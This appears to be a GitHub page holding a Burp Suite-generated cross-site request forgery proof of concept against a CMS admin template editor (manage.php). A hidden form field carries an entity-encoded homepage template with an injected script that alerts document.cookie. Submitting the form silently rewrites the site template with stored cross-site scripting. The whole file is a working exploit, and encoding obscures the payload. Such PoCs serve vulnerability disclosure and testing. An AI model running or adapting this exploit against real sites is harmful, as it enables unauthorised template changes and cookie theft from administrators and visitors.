Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
13 lines (12 sloc) 6.87 KB
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/console/xml/manage.php?type=action&action=edit" method="POST">
<input type="hidden" name="content" value="&#123;&#36;&#61;take&#40;&apos;&#46;public&#46;header&apos;&#41;&#125;&#13;&#10;&#32;&#32;&lt;div&#32;class&#61;&quot;home&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&lt;div&#32;class&#61;&quot;banner&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&lt;h2&gt;&#123;&#36;&#61;take&#40;&apos;index&#46;slogan&apos;&#44;&#32;&apos;lng&apos;&#41;&#125;&lt;&#47;h2&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&lt;h3&gt;&#123;&#36;&#61;take&#40;&apos;index&#46;intro&apos;&#44;&#32;&apos;lng&apos;&#41;&#125;&lt;&#47;h3&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&lt;a&#32;class&#61;&quot;more&quot;&#32;href&#61;&quot;&#123;&#36;&#61;getActualRoute&#40;&apos;aboutus&apos;&#41;&#125;&#47;&quot;&gt;&#123;&#36;&#61;take&#40;&apos;index&#46;text&#45;more&apos;&#44;&#32;&apos;lng&apos;&#41;&#125;&lt;&#47;a&gt;&#13;&#10;&#32;&#32;&#32;&#32;&lt;&#47;div&gt;&#13;&#10;&#32;&#32;&#32;&#32;&lt;div&#32;class&#61;&quot;home&#95;item&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&lt;h2&gt;&#123;&#36;&#61;take&#40;&apos;global&#46;case&#58;index&#46;title&apos;&#44;&#32;&apos;lng&apos;&#41;&#125;&lt;&#47;h2&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&lt;div&#32;class&#61;&quot;cupboard&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;div&#32;class&#61;&quot;full&#32;pictures&#32;clear&#95;float&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;jtbc&#32;&#36;function&#61;&quot;transfer&quot;&#32;&#36;parameter&#61;&quot;genre&#61;case&#59;type&#61;new&#59;limit&#61;3&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;div&#32;class&#61;&quot;item&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;a&#32;href&#61;&quot;&#123;&#36;&#45;baseurl&#125;&#123;&#36;&#61;htmlEncode&#40;&#36;createURL&#40;&apos;detail&apos;&#44;&#32;&apos;&#123;&#36;id&#125;&apos;&#44;&#32;null&#44;&#32;&apos;&#123;&#36;&#45;genre&#125;&apos;&#41;&#41;&#125;&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;p&#32;class&#61;&quot;image&quot;&gt;&lt;img&#32;src&#61;&quot;&#123;&#36;&#45;baseurl&#125;&#123;&#36;&#61;htmlEncode&#40;&#36;getJsonPara&#40;&#35;image&#44;&#32;&apos;fileurl&apos;&#41;&#41;&#125;&quot;&#32;alt&#61;&quot;&quot;&#32;&#47;&gt;&lt;&#47;p&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;p&#32;class&#61;&quot;topic&quot;&gt;&#123;&#36;topic&#125;&lt;&#47;p&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#47;a&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#47;div&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#47;jtbc&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#47;div&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#47;div&gt;&#13;&#10;&#32;&#32;&#32;&#32;&lt;&#47;div&gt;&#13;&#10;&#32;&#32;&#32;&#32;&lt;div&#32;class&#61;&quot;home&#95;item&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&lt;h2&gt;&#123;&#36;&#61;take&#40;&apos;global&#46;team&#58;index&#46;title&apos;&#44;&#32;&apos;lng&apos;&#41;&#125;&lt;&#47;h2&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&lt;div&#32;class&#61;&quot;cupboard&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;div&#32;class&#61;&quot;full&#32;synopsis&#32;clear&#95;float&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;jtbc&#32;&#36;function&#61;&quot;transfer&quot;&#32;&#36;parameter&#61;&quot;genre&#61;team&#59;type&#61;new&#59;limit&#61;4&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;div&#32;class&#61;&quot;item&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;p&#32;class&#61;&quot;photo&quot;&gt;&lt;img&#32;src&#61;&quot;&#123;&#36;&#45;baseurl&#125;&#123;&#36;&#61;htmlEncode&#40;&#36;getJsonPara&#40;&#35;photo&#44;&#32;&apos;fileurl&apos;&#41;&#41;&#125;&quot;&#32;alt&#61;&quot;&quot;&#32;&#47;&gt;&lt;&#47;p&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;p&#32;class&#61;&quot;topic&quot;&gt;&#123;&#36;name&#125;&#32;&lt;em&gt;&#40;&#123;&#36;position&#125;&#41;&lt;&#47;em&gt;&lt;&#47;p&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;p&#32;class&#61;&quot;intro&quot;&gt;&#123;&#36;&#61;encodeTextArea&#40;&#35;intro&#41;&#125;&lt;&#47;p&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;p&#32;class&#61;&quot;clear&quot;&gt;&lt;&#47;p&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#47;div&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#47;jtbc&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#47;div&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#47;div&gt;&#13;&#10;&#32;&#32;&#32;&#32;&lt;&#47;div&gt;&#13;&#10;&#32;&#32;&#32;&#32;&lt;div&#32;class&#61;&quot;home&#95;item&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&lt;h2&gt;&#123;&#36;&#61;take&#40;&apos;global&#46;universal&#47;link&#58;sel&#95;group&#46;1&apos;&#44;&#32;&apos;lng&apos;&#41;&#125;&lt;&#47;h2&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&lt;div&#32;class&#61;&quot;cupboard&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;div&#32;class&#61;&quot;full&#32;links&#32;clear&#95;float&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;jtbc&#32;&#36;function&#61;&quot;transfer&quot;&#32;&#36;parameter&#61;&quot;genre&#61;universal&#47;link&#59;type&#61;new&#59;limit&#61;3&#59;group&#61;1&quot;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;div&#32;class&#61;&quot;item&quot;&gt;&lt;a&#32;href&#61;&quot;&#123;&#36;url&#125;&quot;&#32;target&#61;&quot;&#123;&#36;target&#125;&quot;&gt;&lt;span&gt;&lt;img&#32;src&#61;&quot;&#123;&#36;&#45;baseurl&#125;&#123;&#36;&#61;htmlEncode&#40;&#36;getJsonPara&#40;&#35;image&#44;&#32;&apos;fileurl&apos;&#41;&#41;&#125;&quot;&#32;alt&#61;&quot;&quot;&#32;&#47;&gt;&lt;&#47;span&gt;&lt;&#47;a&gt;&lt;&#47;div&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#47;jtbc&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#47;div&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#47;div&gt;&#13;&#10;&#32;&#32;&#32;&#32;&lt;&#47;div&gt;&#13;&#10;&#32;&#32;&lt;&#47;div&gt;&#13;&#10;&#123;&#36;&#61;take&#40;&apos;&#46;public&#46;footer&apos;&#41;&#125;&#13;&#10;&#13;&#10;&lt;script&gt;alert&#40;document&#46;cookie&#41;&lt;&#47;script&gt;" />
<input type="hidden" name="symbol" value="&#46;tpl&#46;index" />
<input type="hidden" name="node" value="default" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>